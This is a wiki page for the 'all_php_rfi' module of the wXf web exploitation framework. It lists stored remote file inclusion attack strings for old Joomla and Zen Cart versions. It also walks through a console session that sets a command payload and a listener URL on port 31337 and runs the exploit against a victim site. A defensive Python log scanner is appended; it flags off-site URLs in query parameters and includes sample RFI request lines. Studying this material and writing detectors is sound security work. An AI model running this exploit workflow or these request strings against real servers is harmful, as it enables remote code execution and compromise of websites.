exploit rfi php all php rfi

cktricky edited this page Jul 26, 2011 · 5 revisions

Author(s):

Ken Johnson (CKTRICKY)

Description:

Allows you to pull RFI attack strings out of the database. You can choose an RFI string and send off the request.

Module Options:

Name       Value                             Required   Description
----       -----                             --------   -----------
COOKIE                                       true       Example: uniquecookie=cookievalue
PROXYA                                       false      Proxy IP Address
PROXYP                                       false      Proxy Port Number
RFI                                          true       Enter the RFI by name
RURL       http://www.example.com/test.php   true       Target address
THROTTLE   0                                 false      Specify a number, after x requests we pause

Options Explained (Module Specific):

COOKIES -- If you have a cookie or cookies that you'd like to add to the request (whether GET or POST, doesn't matter), go ahead and set them here like so:

SINGLE COOKIE

set COOKIES ASPSESSIONID=1234;

MULTI COOKIE

set COOKIES ASPSESSIONID=1234; ASP.NET_SessionId=5678;

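RFI -- Name of the RFI string you'd like to use. Run show rfi to list the entries stored in the database, then select one by name with set RFI: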

wXf exploit(all_php_rfi)//> show rfi 

RFI List
========

Name        Description                                           Platform   Language
----        -----------                                           --------   --------
joomla_1    Joomla 1.5.0 Beta Release                             joomla     PHP
joomla_2    Joomla 1.0.8                                          joomla     PHP
joomla_3    Joomla 1.0.11, 1.0.12, 1.0.13, 1.0.14                 joomla     PHP
zencart_1   Zen Cart Web Shopping Cart 1.2.7,  1.1.2 d, 1.3.0.2   zencart    PHP

wXf exploit(all_php_rfi)//> set RFI joomla_1

Real world example:

I'd like to exploit a vulnerable Joomla server (version 1.0.8). My IP is 192.168.1.120 and I'd like to listen on port 31337. The victim site is www.example.com.

wXf //> use exploit/rfi/php/all_php_rfi 
wXf exploit(all_php_rfi)//> set RFI joomla_2
-{+}- RFI => joomla_2
wXf exploit(all_php_rfi)//> set PAYLOAD payload/rfi/php/cmd_single 
-{+}-  PAYLOAD => payload/rfi/php/cmd_single
wXf exploit(all_php_rfi)//> set RURL http://www.example.com/joomla
-{+}- RURL => http://www.example.com/joomla
wXf exploit(all_php_rfi)//> set LURL http://192.168.1.120:31337
-{+}- LURL => http://192.168.1.120:31337
wXf exploit(all_php_rfi)//> exploit 
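
For the defending side of the session above, the following is an added example (not part of the original wiki page or of wXf's own code) that flags access-log entries in which a query parameter carries a URL pointing off-site, which is what a request carrying the LURL value would look like in the target's logs. It assumes the request places the URL in the query string; the parameter names, client addresses, log lines and the OWN_HOSTS allowlist are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

OWN_HOSTS = {"www.example.com", "example.com"}  # assumed allowlist of the site's own hosts
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")
# Request line of a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (client addresses and parameter names are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jul/2011:10:00:00 +0000] "GET /joomla/index.php?path=http://192.168.1.120:31337/? HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Jul/2011:10:00:05 +0000] "GET /joomla/index.php?page=http%253A%252F%252F192.168.1.120%253A31337%252F HTTP/1.1" 200 512',
    '198.51.100.4 - - [26/Jul/2011:10:01:00 +0000] "GET /joomla/login.php?next=http://www.example.com/account HTTP/1.1" 302 0',
    '198.51.100.4 - - [26/Jul/2011:10:01:02 +0000] "GET /joomla/index.php?option=com_content&id=7 HTTP/1.1" 200 9001',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so a double-encoded scheme is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_findings(log_line):
    """Return [(param, remote_host)] for parameters whose value is an off-site URL."""
    match = REQUEST_RE.search(log_line)
    query = urlsplit(match.group(1)).query if match else ""
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw).strip().lower()
        if not value.startswith(REMOTE_SCHEMES):
            continue
        try:
            host = urlsplit(value).hostname or ""
        except ValueError:  # malformed authority, e.g. a broken IPv6 literal
            host = ""
        if host not in OWN_HOSTS:  # same-site redirects such as ?next= are not flagged
            findings.append((name, host))
    return findings

def scan(lines):
    """Return {line_number: findings} for lines with at least one finding."""
    results = ((n, rfi_findings(line)) for n, line in enumerate(lines, start=1))
    return {n: found for n, found in results if found}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Parameters sent in a POST body do not appear in a standard access log, so the same check would have to run where request bodies are visible, such as a WAF or application middleware.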